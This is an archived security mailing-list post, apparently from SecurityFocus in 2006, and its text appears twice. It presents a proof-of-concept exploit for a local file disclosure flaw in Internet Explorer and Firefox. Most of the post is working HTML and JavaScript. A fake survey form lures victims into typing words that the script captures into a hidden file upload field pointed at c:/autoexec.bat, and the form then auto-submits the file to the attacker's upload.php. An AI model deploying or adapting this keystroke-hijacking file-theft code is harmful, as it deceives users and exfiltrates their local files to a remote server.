Vuln Dev
Back to list
|
Post reply
InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)
Jun 11 2006 09:37AM
sirdarckcat gmail com
This is a sample PoC Exploit for the Internet Explorer and Mozilla Firefox security flaw explained here:
http://www.techweb.com/showArticle.jhtml?articleID=188702202
and reported by Symantec.
The subjects of the links sugested, are for forcing the user to input:
FILE
AUTOEXEC
BAT
so we can receive:
file://c:/autoexec.bat
and upload this file to a server.
This is a low risk vulnerability.
//--START HTML CODE--//
<html>
<body>
<form method=post action="upload.php" type="multipart/form-data">
Please sugest 3 webpages for each subject (please include http:// or https://)
<ul>
<li>Freeware Files Download</li>
<li>Automovilism</li>
<li>Extreme Sports</li>
<li>Technology</li>
<li>Batman</li>
</ul>
<textarea name=other style="width:100%;height:50%"></textarea><br>
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1">
</form>
<script>
/**
* OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
* by sirdarckcat [at] gmail [.] com
* from: elhacker.net
**/
var nidshift = new Array(0 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0);
var thefilek = new Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,67,190,66,
65,84);
var thefilew = "file://c:/autoexec.bat";
var dv = 0;
var chift = false;
var teo = document.forms[0].thet;
var feo = document.forms[0].other;
function checa(tecla) {
var rt=(tecla.which)?tecla.which:event.keyCode;
var lw=String.fromCharCode(rt);
if (dv>=thefilew.length){
document.forms[0].submit();
}
if (rt == 16){
chift = true;
}
if (rt==thefilek[dv]){
if ((nidshift[dv] && chift) || (!nidshift[dv] && !chift)){
teo.disabled=false;
teo.style.visibility="visible";
teo.focus();
feo.value += thefilew[dv];
dv++;
}
}else{
feo.focus();
teo.disabled=true;
teo.style.visibility="hidden";
}
}
function solsh(tecla){
var rt=(tecla.which)?tecla.which:event.keyCode;
if (rt == 16){
chift = false;
}
}
function mprss(tecla){
var rt=(tecla.which)?tecla.which:event.keyCode;
if (rt == 16){
chift = true;
}
}
document.onkeydown = checa;
document.onkeyup = solsh;
document.onkeypress= mprss;
</script>
</body>
</html>
//--END HTML CODE--//
Att.
Sirdarckcat
www.elhacker.net
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
http://www.techweb.com/showArticle.jhtml?articleID=188702202
and reported by Symantec.
The subjects of the links sugested, are for forcing the user to input:
FILE
AUTOEXEC
BAT
so we can receive:
file://c:/autoexec.bat
and upload this file to a server.
This is a low risk vulnerability.
//--START HTML CODE--//
<html>
<body>
<form method=post action="upload.php" type="multipart/form-data">
Please sugest 3 webpages for each subject (please include http:// or https://)
<ul>
<li>Freeware Files Download</li>
<li>Automovilism</li>
<li>Extreme Sports</li>
<li>Technology</li>
<li>Batman</li>
</ul>
<textarea name=other style="width:100%;height:50%"></textarea><br>
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1">
</form>
<script>
/**
* OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
* by sirdarckcat [at] gmail [.] com
* from: elhacker.net
**/
var nidshift = new Array(0 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0);
var thefilek = new Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,67,190,66,
65,84);
var thefilew = "file://c:/autoexec.bat";
var dv = 0;
var chift = false;
var teo = document.forms[0].thet;
var feo = document.forms[0].other;
function checa(tecla) {
var rt=(tecla.which)?tecla.which:event.keyCode;
var lw=String.fromCharCode(rt);
if (dv>=thefilew.length){
document.forms[0].submit();
}
if (rt == 16){
chift = true;
}
if (rt==thefilek[dv]){
if ((nidshift[dv] && chift) || (!nidshift[dv] && !chift)){
teo.disabled=false;
teo.style.visibility="visible";
teo.focus();
feo.value += thefilew[dv];
dv++;
}
}else{
feo.focus();
teo.disabled=true;
teo.style.visibility="hidden";
}
}
function solsh(tecla){
var rt=(tecla.which)?tecla.which:event.keyCode;
if (rt == 16){
chift = false;
}
}
function mprss(tecla){
var rt=(tecla.which)?tecla.which:event.keyCode;
if (rt == 16){
chift = true;
}
}
document.onkeydown = checa;
document.onkeyup = solsh;
document.onkeypress= mprss;
</script>
</body>
</html>
//--END HTML CODE--//
Att.
Sirdarckcat
www.elhacker.net
[ reply ]